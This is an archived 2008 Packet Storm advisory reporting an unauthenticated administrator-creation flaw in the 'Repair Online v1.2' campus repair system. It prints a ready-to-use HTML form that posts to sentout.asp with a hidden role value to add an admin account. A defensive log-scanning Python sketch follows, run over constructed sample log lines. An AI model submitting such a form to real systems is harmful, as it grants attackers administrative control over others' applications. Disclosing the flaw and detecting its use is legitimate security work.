repaironline-admin.txt

2008-05-27T00:00:00
ID PACKETSTORM:66699
Type packetstorm
Reporter unohope
Modified 2008-05-27T00:00:00

Description

                                        
C. H. R. O. O. T. SECURITY GROUP  
http://www.chroot.org  
  
Hacks In Taiwan Conference 2008  
http://www.hitcon.org  
  
  
Title :: Repair Online v1.2 (sentout) Create Admin Vulnerability  
  
Author :: unohope [at] chroot [dot] org  
  
IRC :: irc.chroot.org #chroot  
  
ScriptName :: 校園報修系統 v1.2 (Campus Repair Request System v1.2)  
  
  
Download :: http://netlab.kh.edu.tw/download/線上報修系統v12.exe  
  
Mirror :: http://www.files.to/get/280246/c8pqqs4ug0  
  
______________  
[Create Admin]  
  
- {sentout.asp} -  
  
<form action="http://localhost/repair/pwd/sentout.asp" method="post">  
user: <input type="text" name="pID" value="adm2"><br>  
pass: <input type="text" name="Pwd" value="123456">  
<input type="hidden" name="pFrom" value="N/A">  
<input type="hidden" name="pName" value="N/A">  
<input type="hidden" name="pTag" value="z,repair,leader">  
<input type="submit" value="add">  
</form>  
  
sentout.asp does not check anything else,  
so we can create a new administrator account arbitrarily,  
... *faint*  
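
Added example (not part of the original advisory or of the application's code): a Python sketch for defenders that searches IIS W3C logs for POSTs to sentout.asp that did not come from the site's own pages, which is what a standalone form like the one above produces. The hostname, the logged fields and the sample log lines are assumptions constructed for illustration.

```python
from urllib.parse import urlsplit

TARGET_STEM = "/repair/pwd/sentout.asp"   # path taken from the advisory's form action
SITE_HOST = "repair.example.edu"          # assumption: the deployment's own hostname

# Constructed IIS W3C log lines (not real traffic; page names other than sentout.asp are made up).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Fields: date time c-ip cs-method cs-uri-stem cs(Referer) sc-status
2008-05-24 10:01:02 192.0.2.10 GET /repair/index.asp - 200
2008-05-24 10:01:09 192.0.2.10 POST /repair/pwd/sentout.asp http://repair.example.edu/repair/pwd/apply.asp 200
2008-05-24 11:15:40 198.51.100.7 POST /repair/pwd/sentout.asp - 200
2008-05-24 11:16:02 203.0.113.5 POST /Repair/pwd/SentOut.asp http://other.example.net/form.html 302
2008-05-24 11:17:30 203.0.113.5 POST /repair/pwd/sentout.asp http://other.example.net/form.html 404
"""

def suspicious_posts(log_text, site_host=SITE_HOST, stem=TARGET_STEM):
    """Return (date, time, c-ip, reason) for served POSTs to `stem` not sent from the site's own pages."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]            # the directive can change mid-file
            continue
        if not line.strip() or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))    # IIS encodes spaces inside fields as '+'
        if row.get("cs-method", "").upper() != "POST":
            continue
        if row.get("cs-uri-stem", "").lower() != stem.lower():   # IIS paths are case-insensitive
            continue
        if not row.get("sc-status", "").startswith(("2", "3")):
            continue                             # request was not served
        referer = row.get("cs(Referer)", "-")    # "-" also when the field is not logged
        host = (urlsplit(referer).hostname or "") if referer != "-" else ""
        if host == site_host.lower():
            continue                             # posted from one of the site's own pages
        reason = "no referer" if not host else "foreign referer: " + host
        hits.append((row.get("date"), row.get("time"), row.get("c-ip"), reason))
    return hits

if __name__ == "__main__":
    for hit in suspicious_posts(SAMPLE_LOG):
        print(*hit)
```

IIS does not log POST bodies, so the submitted pTag value is not visible here, and the Referer is client-supplied; treat hits as leads to compare against the application's list of administrator accounts, not as proof.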
  
______  
[NOTE]  
  
!! This is just for educational purposes, DO NOT use it for illegal purposes. !!  
  
  
# 2008/5/24 - chrO.ot group #  